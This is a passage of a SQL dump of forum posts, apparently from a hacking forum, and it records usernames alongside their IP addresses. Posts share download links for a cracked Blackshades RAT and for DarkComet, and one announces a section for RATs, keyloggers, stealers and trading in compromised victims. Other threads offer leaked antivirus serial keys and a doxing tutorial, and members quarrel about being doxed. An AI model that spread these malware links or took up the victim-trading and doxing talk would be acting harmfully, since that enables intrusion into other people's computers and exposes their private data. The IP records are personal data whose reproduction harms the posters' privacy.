`uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4034', '50', '132', '12', 'RE: [tut]How to DOX', '0', '205', 'mothered', '1349784536', 'Very nice guide Indeed. Thanking you.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '8ffc7c2eca4e9caad497db09d37c9f9d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4035', '764', '3895', '15', 'RE: Hack Pack By Timmy | 2GB |', '0', '61', 'NXK', '1349784599', 'This is alot of stuff man, My folder is almost this big. Hopefully there\'s some nice stuff for members here.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'e60e9a6fcf7188ea5d8ed4a19a6a1ab8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4036', '764', '3895', '15', 'RE: Hack Pack By Timmy | 2GB |', '0', '199', 'Anonymous™', '1349787707', 'Error (509) This account\'s public links are generating too much traffic and have been temporarily disabled!', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '77b03d4da3fccc9d6e2a517f89766bcd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4038', '777', '4018', '4', 'RE: The Ultimatum has Arrived!', '0', '199', 'Anonymous™', '1349796007', 'Hello! Welcome to L33thacking Ultimatum...', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'fefaf0602c6d952179951867639f260f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4039', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349796096', 'http://sphotos-e.ak.fbcdn.net/hphotos-ak-snc7/399654_525432087483184_363798693_n.jpg', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '52c356ec1d8a8bcf6eeae5df01d0fb5f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4040', '767', '3913', '74', 'RE: Do you cheat/hack games?', '0', '199', 'Anonymous™', '1349796284', 'Probably just hacking on minecraft. *Swag*', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '968fa78f7eea78aef28a83c5b56ce991', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4041', '724', '3651', '74', 'RE: Cheese Cake Client', '0', '199', 'Anonymous™', '1349796345', 'I think that people want to see pictures and more info first.', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '2a5a40862b1b191f50e33bbc1832d6ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4042', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '199', 'Anonymous™', '1349796393', 'I play minecraft it is a pretty fun game sometimes.', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '4c969634509e216c1df3d417c0ea1e01', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4043', '777', '4018', '4', 'RE: The Ultimatum has Arrived!', '0', '100', '??zg???g????61', '1349798029', 'Welcome good sir ;D Anarchist sucks..', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', 'b2a921362b021419997fa01b1be689b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4044', '745', '3798', '59', 'RE: [Leak] Huge Folder of Ebooks', '0', '100', '??zg???g????61', '1349798076', ':D glad you guys enjoyed it :D', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', 'a078a98277d042119d880bd75a668929', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4045', '777', '4018', '4', 'RE: The Ultimatum has Arrived!', '0', '62', 'R?????zo?', '1349799585', 'welcome bro, stay HQ and active.', '31.22.168.19', '521578515', '1', '0', '0', '0', '1', '2819e82fb3efd0aab6abbbd4c92af009', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4046', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '62', 'R?????zo?', '1349799643', 'welcome to the community, stay active and HQ.', '31.22.168.19', '521578515', '1', '0', '0', '0', '1', '32a347f8091734c68a96e199059008af', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4047', '190', '665', '56', 'RE: Copy and paste game', '0', '62', 'R?????zo?', '1349799748', 'monetizekings No idea where i copied from.', '31.22.168.19', '521578515', '1', '0', '0', '0', '1', '6551358bc5d5d4873c3b6b8d4344fade', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4048', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '222', 'Exposé', '1349807764', 'Yeh joker I think I know how. I had that issue a while back. And yeh if someone can give me the psd I can make some changes', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'ac57ffb11df12909d1b2e3293035c544', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4049', '738', '3760', '43', 'RE: [LEAK] AVG 2013 Serial Keys', '0', '61', 'NXK', '1349809092', 'Nice contribution to anyone who uses a anti-virus. Good share I approve :)', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '4dd89322000cee41f11ec9e694f1cfaf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4050', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '222', 'Exposé', '1349809726', 'Lol another reason to come to LH....welcome hehe', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'ac1b262be7ac054ed7c4c7dcb2594f95', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4051', '190', '665', '56', 'RE: Copy and paste game', '0', '222', 'Exposé', '1349809953', 'http://www.publicdomainpictures.net/pictures/20000/velka/black-red-green-background.jpg', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '0ed328ae265fc68a1263d78c3e28678c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4052', '782', '0', '7', 'We need to advertise!', '0', '222', 'Exposé', '1349810253', 'Guys....we need to start advertising LH. The more members we have, the more content we have, and the better LH looks. So I urge everyone here to just pick a couple of forums or whatever you want and create threads about LH. If we can get people signing up then others will want to signup. Once you create the thread post in in this thread and the members here at LH can bump up the threads.... I am currently working on getting some advertising spots for LH :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '858a761150d9cd56781fb1c037a93bbc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4053', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349810572', 'This is what I copied + pasted www.theprofiters.com', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'facb87aecbfcea2ef52f926e03048b36', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4054', '783', '0', '49', 'Enable who\'s viewing thread....', '0', '222', 'Exposé', '1349810641', 'You should enabled the option where users can see who is viewing a thread at the same moment. I think it\'s nice to see who else is viewing a thread when you are :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'c6955e63ad3f2cf184a4e952683b9fc0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4055', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '82', 'iTzIpod', '1349810644', 'You took advantage of me. I knew that. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f9f751c863ead1d76f8c75b1f8e9a723', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4056', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1349810696', 'Warnings don\'t do anything. Nothing happens when you get 100%..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ca3d941c6c90bc0f2dcaad322efa79af', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4057', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '82', 'iTzIpod', '1349810731', 't3h jok3r doxed me. What do you expect me to do?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9927754117bb847d8151ed132362181e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4058', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '222', 'Exposé', '1349810820', 'Who cares if he doxed you lol. What\'s the big deal....nobody ever does anything with the dox\'s lol. You should just move on and keep being a part of LH or not...', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'e0c966ac666eff2a4509f8f8f110b8cc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4059', '767', '3913', '74', 'RE: Do you cheat/hack games?', '0', '82', 'iTzIpod', '1349810837', 'Do \"Mods\" on Minecraft count as hacking?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'be9d1eeaf54f96eaa742d645ccf0e409', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4081', '747', '4016', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349824131', '[quote=\'Ultimatum\' pid=\'4016\' dateline=\'1349764657\'] What the fuck is this? [A.Forums] is absolute bull shit. Just cause you guys don\'t have anything I\'ve seen here, doesn\'t give an excuse for you fucktards to go bringing your shit here. The fucking Anarchist kicked me from the forums for NO reason. At least t3h jok3r isn\'t an asshole. [/quote] 1. \"*Chuckles* The shit is still down. But I\'ll see what I can make up the 18 bucks and the 2 bucks I still ow yah Maybe from the booter, hopefully.\" 2. \"Got kicked out\" and your last post on AF was 8 hours this post? [quote=\'The Anarchist\' pid=\'4066\' dateline=\'1349812648\'] [quote=\'R?????zo?\' pid=\'4063\' dateline=\'1349811863\'] [quote=\'The Anarchist\' pid=\'4060\' dateline=\'1349810934\'] What an asshole! He banned me and posted my DOX too! [/quote] why do you even bother to make 300 accounts and get banned all the time? just GTFO of this forum and get a life. [/quote] I made maybe 3-4. It takes me less than a minute. Don\'t flatter yourself. As for posts? I\'ve spent maybe a total of 20-30 minutes posting here, mainly to highlight the owner\'s actions. It doesn\'t take much time out of my day, and it\'s really not that much activity. [/quote] This clearly shows that you are immature and have no life. If I posted your DOX online then firstly prove it that it\'s online and secondly prove it that I posted it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a87009fbe7b17e7e974ddc1de1f786c0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4159', '800', '0', '15', 'Blackshades v5.3 Cracked By The Old Warrior', '0', '203', 'NeonLights', '1349887315', '[align=center][img]http://2.bp.blogspot.com/-ohF9qNcBNdk/UHQIHVQbGpI/AAAAAAAAAsM/J9C7sXaHnBE/s400/images.jpeg[/img] The Big surprise is BlackShades 5.3 Original First Release! (Backdoored) The Old Warrior always Discover that Blackshades 5.3 was Backdoored At the same time create clean version Causing a great loss for the team of blackshades After paying big money to HF To remove Version This is the proof: [video=youtube]http://www.youtube.com/watch?feature=player_embedded&v=4y4E9HOXYY4[/video] *Updated Of The Old Warrior* Alright i took sometime to fix the errors File CRC etc i also added Logs.txt patching method is now better using function hooking (0xE9) Here is updated version Instructions: 1.Extract in the BS Folder 2.Double click Injector.exe 3.Enjoy Blackshades v5.3 Cracked! [video=youtube]http://www.youtube.com/watch?feature=player_embedded&v=Izq5KZtgyKw[/video] [lock] download: http://adf.ly/382489/http://lh.rs/dNlunBhCIHwb mirror: http://adf.ly/382489/http://ge.tt/1ahCNAP/v/0 [/lock] enjoy guys![/align]', '205.237.34.10', '-840097270', '1', '0', '1', '1352010934', '1', '2bfc35476433685a2e4024bf20ac40b6', '0', '1352010934'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4062', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '222', 'Exposé', '1349811487', 'I thought nobody would be able to dox you lol?', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '6460b3fe63ada605e628e5667720470a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4063', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '62', 'R?????zo?', '1349811863', '[quote=\'The Anarchist\' pid=\'4060\' dateline=\'1349810934\'] What an asshole! He banned me and posted my DOX too! [/quote] why do you even bother to make 300 accounts and get banned all the time? just GTFO of this forum and get a life.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '505acc7ba88cf87191f6b5abb8bd2a04', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4161', '791', '4134', '7', 'RE: Are you a morning person?', '0', '222', 'Exposé', '1349895140', 'Awwwww hell no lol. Yeh I go to bed like 2 am and my first class is like 9am. Sucks...', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'aad8ba3cb371516f91d8702dc0c8f542', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4162', '800', '4159', '15', 'RE: Blackshades v5.3 Cracked By The Old Warrior', '0', '100', '??zg???g????61', '1349896348', 'Does this really work? if so thanks a ton :D', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '33bdce0c8c025b7b441ba0d1419d7050', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4163', '789', '4106', '19', 'RE: ratters', '0', '100', '??zg???g????61', '1349897096', 'Darkcomet is pretty LQ, if you have the money ($29.99 USD) buy paradox RAT. If not use one of the cracked ones posted here. :3', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '69d811685c73e4ccf5d57bd9fbf7c5cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4164', '800', '4159', '15', 'RE: Blackshades v5.3 Cracked By The Old Warrior', '0', '203', 'NeonLights', '1349902861', 'yea it does :D pretty epic that theres no backdoor and no miner in it :D', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', '340c6e0d706a009032c2ad55e0228b0d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4165', '789', '4106', '19', 'RE: ratters', '0', '203', 'NeonLights', '1349902945', 'lmao i posted them haha and darkcomet is what i used to use and its not LQ its pretty HQ for a free rat... thats been around for ever...', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', '8dcfef9693eabc60b2c07cb3a1a38735', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4065', '767', '4059', '74', 'RE: Do you cheat/hack games?', '0', '62', 'R?????zo?', '1349812301', '[quote=\'iTzIpod\' pid=\'4059\' dateline=\'1349810837\'] Do \"Mods\" on Minecraft count as hacking? [/quote] probably not, but makes the game easier in some way :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b9cdaf3645d371e5aedefd6776e28ac3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4066', '747', '4063', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '246', 'The Anarchist', '1349812648', '[quote=\'R?????zo?\' pid=\'4063\' dateline=\'1349811863\'] [quote=\'The Anarchist\' pid=\'4060\' dateline=\'1349810934\'] What an asshole! He banned me and posted my DOX too! [/quote] why do you even bother to make 300 accounts and get banned all the time? just GTFO of this forum and get a life. [/quote] I made maybe 3-4. It takes me less than a minute. Don\'t flatter yourself. As for posts? I\'ve spent maybe a total of 20-30 minutes posting here, mainly to highlight the owner\'s actions. It doesn\'t take much time out of my day, and it\'s really not that much activity.', '177.142.119.28', '-1316063460', '0', '0', '246', '1349812677', '1', 'cfd53d7b9c8a7dbc39f29fdcba9a1bbf', '0', '1349812677'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4110', '789', '4106', '19', 'RE: ratters', '0', '203', 'NeonLights', '1349835665', 'DAM FUCKING RIGHT IT IS lol :P', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', '610285e691bc17dfab127582ee756920', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4109', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '222', 'Exposé', '1349835237', 'Yeh guys congratz. Let\'s make this an awesome community :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '85b2975394e7656a1e21b19494b51348', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4108', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '1', 't3h jok3r', '1349834528', 'Thread closed. New leader needs to open a new thread.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '865eb92606c5e5e6fa13d7403e8801bf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4107', '789', '4106', '19', 'RE: ratters', '0', '100', '??zg???g????61', '1349833524', 'Fuck yes. This is going to be an awesome group.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'a3da5ab96a69979ad1aba72ad4c0926b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4106', '789', '0', '19', '[Junk]ratters', '0', '203', 'NeonLights', '1349833034', '[align=center]Hey, neon here leader of ratters just wanted to say that this section is for blackhat activity and threads/posts only! like: rats/keyloggers/stealers... and victim/zombie selling/trading can be done in this section/group im looking forward to seeing u guys active in this section :)[/align]', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', '92ae48beb894e54a5f0448fcfa757c71', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4067', '785', '0', '49', 'Install Tapatalk?', '0', '222', 'Exposé', '1349813687', 'I\'m on my mobile device a lot and I think it would be easier if I could use Tapatalk to browse threads and stuff. Is there anyway we can get Tapatalk integrated pl0x?', '66.87.85.147', '1113019795', '1', '0', '0', '0', '1', 'a57fbdc32e1c6d45ef69e8a5acae5958', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4068', '778', '4022', '19', 'RE: Gigbucks to Fiverr method', '0', '53', 'sirchamp', '1349813700', 'Feck! I just bought that e-book of theodore bagwell on HF! Omg. Just wasted 5 dollars', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '45c6a7705925eb7ed20f29a59b11eee1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4069', '738', '3760', '43', 'RE: [LEAK] AVG 2013 Serial Keys', '0', '100', '??zg???g????61', '1349813888', 'Thanks! :D I try to be HQ when posting.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '48415336cf18a9ba605405515d4ef38d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4070', '785', '4067', '49', 'RE: Install Tapatalk?', '0', '62', 'R?????zo?', '1349818069', 'I would love this too actually.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '46563c2628d8d80a40101abadcd63c47', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4071', '778', '4022', '19', 'RE: Gigbucks to Fiverr method', '0', '62', 'R?????zo?', '1349818523', 'bad luck bro :( you might get your 5 dollars back with this method though.', '94.132.244.168', '1585771688', '1', '0', '62', '1349818536', '1', '19f49513ed7533ab912a3c415058b62a', '0', '1349818536'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4158', '799', '0', '15', 'Darkcomet rat 5.4 Legacy Beta', '0', '203', 'NeonLights', '1349887269', '[align=center][img]http://img11.hostingpics.net/pics/155301Sanstitre.gif[/img] For More Info Go to : http://www.darkcomet-rat.com/ [lock]download: http://localhostr.com/xAr1dTD8JEm9[/lock] or download from original site enjoy![/align]', '205.237.34.10', '-840097270', '1', '0', '1', '1352010952', '1', 'f4217408d22060ac301b285149455c56', '0', '1352010952'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES 